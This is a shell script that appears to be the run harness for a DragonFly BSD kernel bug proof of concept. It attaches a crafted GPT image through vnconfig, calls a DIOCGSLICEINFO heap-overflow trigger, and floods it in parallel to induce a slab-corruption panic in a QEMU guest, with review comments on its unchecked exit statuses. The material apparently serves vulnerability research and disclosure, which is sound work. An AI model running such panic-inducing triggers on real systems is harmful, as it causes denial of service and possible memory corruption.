#!/bin/sh
# DF-0074 run script -- triggers the DIOCGSLICEINFO heap overflow and induces
# the slab-corruption panic. MUST RUN AS ROOT (devfs grants /dev/vn0* as
# root:operator crw-r----- on the default ruleset; an unprivileged user gets
# EACCES -- see VERDICT.md "Reachability"). The panic is asynchronous
# (slab_cleanup trips after the trigger process exits), so this script may
# return before the guest freezes; the proof is in dfbsd-qemu/boot.log.
#
# Usage (as root on the guest):  ./run.sh [vn_device]
# vn(4) device name (bare name only, e.g. vn0 -- the script prepends /dev/ itself).
DEV=${1:-vn0}
# Run from the script's own directory so ./overflow.img, ./trigger and
# ./trigger_stress resolve. NOTE(review): there is no 'set -e' and no '|| exit'
# here; if the cd fails the script keeps going in the caller's cwd and the
# relative paths below will not resolve.
cd "$(dirname "$0")"
echo "=== attaching crafted GPT image (128 entries) to $DEV ==="
# The attach status is echoed, not checked: a failed attach (e.g. EACCES when
# not run as root, see header) still falls through to every step below.
vnconfig -c "$DEV" ./overflow.img
echo "attach rc=$?"
# ${DEV}* is intentionally unquoted: the glob lists every node devfs created
# for the attached device (stderr merged so a missing node is visible too).
ls /dev/${DEV}* 2>&1 | head -20
echo
echo "=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ==="
# One trigger run against the first slice node; its exit status is reported
# but not acted on.
./trigger /dev/${DEV}s1
echo "trigger rc=$?"
echo
echo "=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ==="
# Second argument is the iteration count passed through to trigger_stress.
./trigger_stress /dev/${DEV}s1 5
echo "stress rc=$?"
echo
echo "=== parallel flood (16 procs) to churn slab zones hit by the overrun ==="
# Fan out 16 background trigger processes (stdout/stderr discarded), then
# barrier on all of them with a bare 'wait'.
i=0
while [ $i -lt 16 ]; do
    ./trigger /dev/${DEV}s1 >/dev/null 2>&1 &
    i=$((i+1))
done
wait
# NOTE(review): POSIX 'wait' with no operands always exits 0, so this "flood
# rc" cannot reflect any child's status -- it only confirms the barrier
# returned. Per-child status would need 'wait "$pid"' for each recorded $!.
echo "flood rc=$?"
echo
# The panic, if it comes, happens after this script exits (see header); the
# guest console / dfbsd-qemu/boot.log is where the result must be read.
echo "=== if the guest is still up, the async slab_cleanup panic will follow; ==="
echo "=== check dfbsd-qemu/boot.log for: 'Fatal trap 12 ... slab_cleanup'      ==="
# Best-effort detach; errors are deliberately silenced, presumably because the
# attach may have failed earlier or the guest may already be going down.
vnconfig -u "$DEV" 2>/dev/null || true
